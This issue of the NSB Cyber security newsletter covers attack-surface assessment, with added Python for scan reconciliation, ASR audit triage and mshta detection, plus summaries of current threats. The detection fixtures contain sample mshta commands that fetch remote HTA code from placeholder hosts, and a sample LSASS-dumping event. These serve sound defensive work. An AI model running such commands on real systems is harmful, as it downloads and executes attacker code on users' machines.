#NSBCS.059 - Under the (Attack) Surface
Source: NSB Cyber
Under the (Attack) Surface
What is Attack Surface?
“Attack surface” describes every avenue a threat actor could use to obtain an initial foothold on an organisation’s systems or networks. The emphasis is on “every”: it is not limited to the exploitation of internet-facing servers and applications, but also covers techniques that rely on social engineering, such as tricking a user into opening a malicious Microsoft Word document, or plugging a malicious USB device straight into a work computer.
When assessing attack surface, it helps to combine an understanding of your organisation’s assets (both hardware and software!) with cyber threat intelligence on current attack techniques, so that the attack paths posing the most significant risk can be identified and prioritised for mitigation. An example is the use of JavaScript files as malware payloads by GootLoader. A typical user rarely needs to execute a JavaScript (.js) file, yet by default Windows opens a double-clicked .js file with Windows Script Host, which runs it. Blocking typical users from directly executing JavaScript files (for example by changing the default handler for .js files to a text editor, or disabling Windows Script Host for those users) reduces the risk of a GootLoader payload executing, even if the user keeps double-clicking on it!
Another method of identifying potentially unknown attack surface is active scanning and discovery of your assets, particularly those that are internet-facing. Running frequent scans provides a point-in-time snapshot of your exposure, such as whether a web server or a file-transfer server is reachable from the internet, and allows you to validate whether each service should be exposed at all. It should be no surprise that a service which is open, but which the organisation has no need for, should be closed. Because each scan is only a snapshot, compare successive results against your asset inventory so that newly exposed services stand out rather than blending in.
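As an added example (not part of the NSB Cyber newsletter), the following Python script shows the validation step the paragraph describes: it parses nmap's grepable (-oG) output from an external scan and reconciles it against an approved-exposure inventory, so that unapproved open ports, approved services that have disappeared, and responding hosts that are not in the inventory at all are each reported separately. The scan output and the inventory are constructed sample data using RFC 5737 documentation addresses, and the inventory format (host mapped to approved port/protocol pairs) is an assumption for the example.

```python
"""Reconcile an external port scan against an approved-exposure inventory.

Added example (not NSB Cyber's code). Parses nmap grepable (-oG) output and
reports three kinds of drift an attack-surface review cares about:
  unexpected     an open port the inventory does not approve for that host
  missing        an approved service that was not seen open (outage, or stale inventory)
  unknown_hosts  a host that answered but is not in the inventory at all
"""
import re
from dataclasses import dataclass

# Constructed sample: roughly what `nmap -sV -oG - 203.0.113.0/28` emits. Addresses are
# RFC 5737 documentation space and the services are illustrative.
SAMPLE_SCAN = """\
# Nmap 7.94 scan initiated Mon Jan 27 09:00:00 2025 as: nmap -sV -oG - 203.0.113.0/28
Host: 203.0.113.10 (www.example.com)\tStatus: Up
Host: 203.0.113.10 (www.example.com)\tPorts: 443/open/tcp//https//nginx/\tIgnored State: filtered (999)
Host: 203.0.113.11 (files.example.com)\tStatus: Up
Host: 203.0.113.11 (files.example.com)\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 9.2/, 443/open/tcp//https//Apache httpd/\tIgnored State: closed (997)
Host: 203.0.113.12 ()\tStatus: Up
Host: 203.0.113.12 ()\tPorts: 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/\tIgnored State: filtered (999)
# Nmap done at Mon Jan 27 09:03:12 2025 -- 16 IP addresses (3 hosts up) scanned
"""

# Constructed inventory (assumed format): host -> approved (port, protocol) pairs.
INVENTORY = {
    "203.0.113.10": {(80, "tcp"), (443, "tcp")},
    "203.0.113.11": {(22, "tcp"), (443, "tcp")},
}

@dataclass(frozen=True, order=True)
class OpenPort:
    host: str
    port: int
    proto: str
    service: str

# "Host: <ip> (<name>)\tPorts: <entries>[\tIgnored State: ...]"; "Status: Up" lines do not match.
PORTS_LINE = re.compile(r"^Host: (\S+) \(([^)]*)\)\tPorts: (.*?)(?:\tIgnored State:.*)?$")

def parse_nmap_grepable(text):
    """Return every open port in nmap -oG output as a list of OpenPort."""
    found = []
    for line in text.splitlines():
        m = PORTS_LINE.match(line)
        if not m:
            continue
        host, _name, entries = m.groups()
        for entry in entries.split(","):
            # Entry layout is port/state/proto/owner/service/rpc-info/version/ ; the version
            # field may itself contain "/" so only the fixed leading fields are trusted.
            fields = entry.strip().split("/")
            if len(fields) < 5:
                continue
            port, state, proto, service = fields[0], fields[1], fields[2], fields[4]
            if state == "open":
                found.append(OpenPort(host, int(port), proto, service))
    return found

def reconcile(open_ports, inventory):
    """Compare observed exposure with approved exposure and return the three drift lists."""
    observed = {}
    for p in open_ports:
        observed.setdefault(p.host, set()).add((p.port, p.proto))
    unexpected = sorted(
        p for p in open_ports
        if p.host in inventory and (p.port, p.proto) not in inventory[p.host]
    )
    missing = sorted(
        (host, port, proto)
        for host, approved in inventory.items()
        for port, proto in approved
        if (port, proto) not in observed.get(host, set())
    )
    unknown_hosts = sorted(set(observed) - set(inventory))
    return {"unexpected": unexpected, "missing": missing, "unknown_hosts": unknown_hosts}

def review(scan_text=SAMPLE_SCAN, inventory=INVENTORY):
    """Parse a scan and reconcile it in one step."""
    return reconcile(parse_nmap_grepable(scan_text), inventory)

if __name__ == "__main__":
    result = review()
    for p in result["unexpected"]:
        print(f"UNEXPECTED  {p.host}:{p.port}/{p.proto} ({p.service}) - close it, or record an owner and a reason")
    for host, port, proto in result["missing"]:
        print(f"MISSING     {host}:{port}/{proto} approved but not seen - outage, or stale inventory?")
    for host in result["unknown_hosts"]:
        print(f"UNKNOWN     {host} answered but is not in the inventory - candidate shadow IT")
```

Feeding it real output (`nmap -sV -oG scan.txt <your ranges>`) is a matter of replacing SAMPLE_SCAN and INVENTORY; the useful part is that every "unexpected" line forces a decision (close the port, or add it to the inventory with an owner), and every "unknown" host is a lead for the shadow IT discussion that follows.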
For larger organisations, discovering the unknown unknowns, i.e. devices that belong to them but that they are not aware of (Shadow IT), can also be of great concern. Discovering such devices relies on analysing open sources such as WHOIS registries, internet-wide scan databases, certificate transparency logs or search engines to identify potentially exposed assets that were never recorded in the inventory.
This does not cover every possible avenue of attack, but it should give you some insight into how to think about your attack surface.
How do you assess your attack surface?
Here are some suggestions for starting your journey towards mapping out your attack surface:
Conduct internal and external scanning, and reconcile the results against what you expect to be exposed;
Ensure you have an asset inventory and regularly review the status of the assets in it;
Review cyber threat intelligence sources such as MITRE ATT&CK or threat actor reports covering your industry; and
Review the Microsoft Defender Attack Surface Reduction (ASR) rules and consider enabling them in audit mode to review the activity they would block in your network before switching them to block mode.
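As an added example (again not the newsletter's own material) that ties the GootLoader .js discussion above to the last suggestion: once ASR rules run in audit mode, each would-have-been block is written to the Microsoft-Windows-Windows Defender/Operational log as Event ID 1122 (1121 is the block-mode equivalent). The Python below takes those events exported as XML (for instance via Get-WinEvent with an EventID=1122 XPath filter and each record's ToXml() method) and summarises them by rule and by recurring process/path combination, which is what you need to separate business software that legitimately trips a rule from activity such as wscript.exe running a freshly downloaded .js. The events are constructed sample data modelled on the 1122 event's data fields; the field names ("ID", "User", "Path", "Process Name") and the rule GUID-to-name table are assumptions to check against your own exported events and Microsoft's ASR rule reference.

```python
"""Summarise Microsoft Defender ASR audit events (Event ID 1122) exported as XML.

Added example (not NSB Cyber's code). In audit mode every would-have-been block
is logged to Microsoft-Windows-Windows Defender/Operational as Event ID 1122
(1121 is the block-mode equivalent). Before switching a rule to block you want to
know which rules fire, how often, and from which process/path combinations, so
that legitimate business software can be excluded and real abuse investigated.
"""
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Rule GUID -> short name for the rules used in the sample. Assumption: verify each GUID
# against Microsoft's ASR rule reference before relying on it.
ASR_RULES = {
    "D4F940AB-401B-4EFC-AADC-AD5F3C50688A": "Block Office apps from creating child processes",
    "D3E037E1-3EB8-44C8-A917-57927947596D": "Block JS/VBS from launching downloaded executable content",
    "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC": "Block execution of potentially obfuscated scripts",
    "9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2": "Block credential stealing from LSASS",
}

def _event(event_id, computer, user, rule_id, process, path):
    """Build one constructed event in the shape ToXml() exports. The data field names
    ('ID', 'User', 'Path', 'Process Name') are modelled on the 1122 event; confirm locally."""
    return (f'<Event xmlns="{NS["e"]}"><System><Provider Name="Microsoft-Windows-Windows Defender"/>'
            f'<EventID>{event_id}</EventID><TimeCreated SystemTime="2025-01-27T09:14:02Z"/>'
            f'<Computer>{computer}</Computer></System><EventData><Data Name="ID">{rule_id}</Data>'
            f'<Data Name="User">{user}</Data><Data Name="Path">{path}</Data>'
            f'<Data Name="Process Name">{process}</Data></EventData></Event>')

# Constructed sample: a downloaded .js run through wscript.exe on one workstation, a finance
# add-in that spawns a helper from Excel on three machines, and one block-mode (1121) event.
SAMPLE_EVENTS = "<Events>" + "".join([
    _event(1122, "WS-0142", r"CORP\jdoe", "D3E037E1-3EB8-44C8-A917-57927947596D",
           r"C:\Windows\System32\wscript.exe", r"C:\Users\jdoe\Downloads\Agreement_2025.js"),
    _event(1122, "WS-0142", r"CORP\jdoe", "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC",
           r"C:\Windows\System32\wscript.exe", r"C:\Users\jdoe\Downloads\Agreement_2025.js"),
    _event(1122, "FIN-01", r"CORP\asmith", "D4F940AB-401B-4EFC-AADC-AD5F3C50688A",
           r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
           r"C:\Program Files\Acme Reporting\acmeexport.exe"),
    _event(1122, "FIN-02", r"CORP\bwong", "D4F940AB-401B-4EFC-AADC-AD5F3C50688A",
           r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
           r"C:\Program Files\Acme Reporting\acmeexport.exe"),
    _event(1122, "FIN-03", r"CORP\ckhan", "D4F940AB-401B-4EFC-AADC-AD5F3C50688A",
           r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
           r"C:\Program Files\Acme Reporting\acmeexport.exe"),
    _event(1121, "WS-0142", r"CORP\jdoe", "9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2",
           r"C:\Users\jdoe\AppData\Local\Temp\dump.exe", r"C:\Windows\System32\lsass.exe"),
]) + "</Events>"

def parse_asr_events(xml_text, event_id=1122):
    """Return the ASR events with the given Event ID as plain dicts."""
    events = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != str(event_id):
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        rule_id = data.get("ID", "").upper()
        tc = ev.find("e:System/e:TimeCreated", NS)
        events.append({
            "time": tc.get("SystemTime", "") if tc is not None else "",
            "computer": ev.findtext("e:System/e:Computer", default="", namespaces=NS),
            "rule_id": rule_id,
            "rule": ASR_RULES.get(rule_id, f"unknown rule {rule_id}"),
            "user": data.get("User", ""),
            "process": data.get("Process Name", ""),
            "path": data.get("Path", ""),
        })
    return events

def _combo(e):
    """Grouping key: which rule fired for which process acting on which path."""
    return (e["rule"], e["process"].lower(), e["path"].lower())

def summarise(events, recurring_threshold=3):
    """Count audits per rule and list (rule, process, path) combinations seen at least
    recurring_threshold times. Combinations recurring across many hosts from Program Files
    are exclusion candidates; one-off hits from user-writable paths are investigation leads."""
    by_rule = Counter(e["rule"] for e in events)
    counts = Counter(_combo(e) for e in events)
    hosts = defaultdict(set)
    for e in events:
        hosts[_combo(e)].add(e["computer"])
    recurring = [
        {"rule": r, "process": p, "path": path, "count": n, "hosts": len(hosts[(r, p, path)])}
        for (r, p, path), n in counts.most_common() if n >= recurring_threshold
    ]
    return {"by_rule": by_rule, "recurring": recurring}

if __name__ == "__main__":
    summary = summarise(parse_asr_events(SAMPLE_EVENTS))
    for rule, n in summary["by_rule"].most_common():
        print(f"{n:4d}  {rule}")
    for r in summary["recurring"]:
        print(f"recurring x{r['count']} on {r['hosts']} host(s): {r['rule']} | {r['process']} -> {r['path']}")
```

On the sample, the Excel-to-acmeexport.exe combination recurs on three hosts and is the kind of hit you would scope an exclusion for (or fix the add-in), whereas the two single audits from wscript.exe acting on a file in a Downloads folder are exactly the GootLoader pattern the earlier paragraph describes and are what the rule should block once switched out of audit mode.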
For information on NSB Cyber’s Cyber Threat Intelligence capabilities or to book a meeting with our team, click here.
What we read this week
Actively Exploited SimpleHelp Vulnerabilities - Threat actors are exploiting multiple vulnerabilities (CVE-2024-57726, CVE-2024-57727 and CVE-2024-57728) in SimpleHelp's remote monitoring and management (RMM) software to breach corporate networks. By targeting outdated instances, they gain persistent remote access, push malware and pivot across affected systems. Once inside, they create privileged accounts and use SimpleHelp’s auto-update scripts to escalate their capabilities. The most significant flaw is insufficient authorisation checking, which allows the unauthorised installation of malicious tools. SimpleHelp advises immediately updating to patched versions, reviewing logs for signs of abuse, and strongly segmenting RMM infrastructure. If the software is not required for day-to-day business operations, administrators should remove it from their environment.
Fortinet Vulnerability Exploit Up for Sale - Threat actors have reportedly been selling a working exploit for Fortinet devices on Russian-language dark web forums. The exploit leverages CVE-2024-55591, which affects FortiOS versions 7.0.0 to 7.0.16 and could allow remote attackers to bypass authentication and gain super-admin access to affected instances. With that access, threat actors could retrieve sensitive information and proceed to execute arbitrary commands. Fortinet has acknowledged the vulnerability and released patches for the affected versions. Users are advised to assess their exposure, update to unaffected versions, disable public access to management interfaces, and monitor network traffic for indicators of compromise (IOCs) associated with the active exploitation.
Hellcat & Morpheus - Researchers discovered that the newly minted Hellcat and Morpheus ransomware variants share almost identical code and capabilities, indicating a shared codebase or a shared builder application leveraged by affiliates tied to both groups. Both payloads feature consistent code structures, encryption routines and overlapping TTPs, including advanced evasion tactics, lateral movement and stealthy data exfiltration. Deployment patterns suggest affiliates rely on proven malicious frameworks and customisation to maximise profitability while obscuring attribution. Analysts warn that these rebrands may herald increased campaigns, complicated by affiliate-based distribution. Indicators of compromise have been published to aid detection of the malware.
Novel IoT Botnet Linked to Large-Scale DDoS Attacks - Trend Micro researchers have identified a global IoT botnet launching large-scale DDoS attacks, including against Japanese organisations. Built on Mirai and Bashlite variants, the botnet compromises devices through known vulnerabilities and weak credentials. Wireless routers and IP cameras from major brands are infected by downloading malware payloads, which then connect to command-and-control servers for coordinated attacks. Targets are concentrated in North America and Europe, though Japan remains a significant victim. To mitigate the risk on the receiving end, the researchers recommend using a content delivery network (CDN) provider, enforcing rate limiting, and conducting real-time IP monitoring and blocking to minimise disruption; owners of such devices shrink the botnet's supply by changing default credentials and patching firmware.
Lumma Stealer Delivered Through Fake CAPTCHA Campaign - Reports describe a new malware campaign that uses fake CAPTCHA verification checks to deliver the Lumma infostealer. The campaign has hit multiple verticals, including healthcare, banking, marketing and telecommunications, and is assessed to be global in scope, with Argentina, Colombia, the Philippines and the US the most affected. The attack chain begins when a user visits a compromised website, which redirects them to a bogus CAPTCHA instructing them to copy and paste a command into the Windows Run prompt. The command uses the native mshta.exe binary to download and execute an HTA file from a remote server; the HTA then runs a chained command that decodes and loads the Lumma payload. It is worth noting that, because execution happens outside the browser, the attack sidesteps browser-based defences, so detection has to come from endpoint telemetry such as process-creation and command-line logging.
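As an added detection example (not from the cited report): the chain above leaves a characteristic trace in process-creation telemetry, because a command pasted into the Run prompt is spawned by explorer.exe and mshta.exe then receives a remote URL on its command line. The Python below scores process-creation events exported as JSON lines (field names follow Sysmon Event ID 1) against those conditions. The events are constructed, the domain names use reserved example TLDs, and the three severity tiers are this example's own convention rather than anything from the report.

```python
"""Flag mshta.exe launches that fetch remote content, especially from the Run prompt.

Added example (not from the cited report). Scores process-creation telemetry (Sysmon
Event ID 1 or equivalent, exported as JSON lines) against the chain described above:
a command pasted into Win+R is spawned by explorer.exe, mshta.exe starts, and its
command line carries an http(s) URL to the remote HTA. Each condition is reported
separately so an analyst can see which ones fired.
"""
import json
import re

# Constructed telemetry; field names follow Sysmon Event ID 1. Domains use reserved TLDs.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"Computer": "WS-0142", "User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha-verify.example/check/verify.hta"},
    {"Computer": "WS-0077", "User": "CORP\\asmith", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    {"Computer": "WS-0077", "User": "CORP\\asmith", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad"},
    {"Computer": "WS-0201", "User": "CORP\\svc_build", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://cdn-static.example/a"},
])

RUN_PROMPT_PARENTS = {"explorer.exe"}   # Win+R and Start-menu launches are children of explorer.exe
# mshta follows any URL it is given; the remote file does not need a .hta extension.
REMOTE_URL = re.compile(r"""\b(?:https?|ftp)://[^\s"']+""", re.IGNORECASE)

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return (severity, reasons) for one event; severity None means nothing to report."""
    reasons = []
    if basename(event.get("Image", "")) != "mshta.exe":
        return None, reasons
    reasons.append("mshta.exe executed")
    remote = REMOTE_URL.search(event.get("CommandLine", ""))
    if remote:
        reasons.append(f"remote HTA source {remote.group(0)}")
    from_run_prompt = basename(event.get("ParentImage", "")) in RUN_PROMPT_PARENTS
    if from_run_prompt:
        reasons.append("parent is explorer.exe (consistent with a Run-prompt or Start-menu launch)")
    if remote and from_run_prompt:
        return "high", reasons      # the fake-CAPTCHA chain exactly
    if remote:
        return "medium", reasons    # remote HTA via a script or scheduled task: still a LOLBin download
    return "low", reasons           # local HTA: baseline it, many environments see none at all

def detect(jsonl_text):
    """Run evaluate() over JSON-lines telemetry and return the alerts in input order."""
    alerts = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        severity, reasons = evaluate(event)
        if severity is not None:
            alerts.append({"severity": severity, "computer": event.get("Computer", ""),
                           "user": event.get("User", ""), "command": event.get("CommandLine", ""),
                           "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity'].upper():6}] {a['computer']} {a['user']}: {a['command']}")
        for r in a["reasons"]:
            print(f"          - {r}")
```

The "low" tier exists so that the rule does not go silent on environments where mshta.exe is never used legitimately: in that case any execution is worth a look, and the baseline count of low alerts tells you whether you can safely block mshta.exe outright (for example with an ASR rule or application control) rather than only detect it.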
References
https://www.bleepingcomputer.com/news/security/hackers-exploiting-flaws-in-simplehelp-rmm-to-breach-networks/
https://cybersecuritynews.com/hackers-allegedly-selling-fortinet-exploit/
https://www.sentinelone.com/blog/hellcat-and-morpheus-two-brands-one-payload-as-ransomware-affiliates-drop-identical-code/
https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
https://thehackernews.com/2025/01/beware-fake-captcha-campaign-spreads.html